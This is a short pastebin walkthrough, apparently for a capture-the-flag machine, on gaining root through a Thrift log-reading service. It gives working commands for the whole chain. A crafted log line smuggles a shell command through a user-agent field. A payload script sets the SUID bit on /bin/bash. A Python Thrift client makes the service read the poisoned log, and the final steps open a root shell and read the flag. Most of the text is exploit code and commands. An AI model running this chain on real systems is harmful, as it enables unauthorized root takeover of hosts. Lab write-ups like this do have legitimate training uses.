Forward 9090 to your local machine

1
ssh -i id_ecdsa -L 9090:127.0.0.1:9090 [email protected]

Create malicous logs

Create this file on /tmp/malicious.log on the remote machine:

1
127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"

Create payload.sh

Create this file on /tmp/payload.sh on the remote machine:

1
chmod +s /bin/bash

Go back to your machine

Create a file named log_service.thrift with the following content:

1
2
3
4
5
namespace go log_service

service LogService {
    string ReadLogFile(1: string filePath)
}

After creating the thrift file, execute this command to generate the client code:

1
thrift -r --gen py log_service.thrift

Then cd gen-py and create this file as client.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # Import generated Thrift client code

def main():
    # Set up a transport to the server
    transport = TSocket.TSocket('localhost', 9090)

    # Buffering for performance
    transport = TTransport.TBufferedTransport(transport)

    # Using a binary protocol
    protocol = TBinaryProtocol.TBinaryProtocol(transport)

    # Create a client to use the service
    client = LogService.Client(protocol)

    # Open the connection
    transport.open()

    try:
        # Specify the log file path to process
        log_file_path = "/tmp/malicious.log"
        
        # Call the remote method ReadLogFile and get the result
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)
    
    except Thrift.TException as tx:
        print(f"Thrift exception: {tx}")

    # Close the transport
    transport.close()

if __name__ == '__main__':
    main()

Install the required dependencies:

1
pip3 install thrift

Run the client:

1
python3 client.py

Get the flag

After running the client, /bin/bash will be set SUID and you can get root shell by executing /bin/bash -p and then cat /root/root.txt to get the flag.

Edit
PDF PNG
Pub: 14 Sep 2024 23:15 UTC
Update: 14 Sep 2024 23:20 UTC
views: 1095
New· How· IP.im· T.im· W.is· Base64.is· Favicon.is· PDF.is· Date.is· TrueURL.com· Portcheck.ing· TLDhub.com· Contact· Issue

text.is - Markdown Pastebin.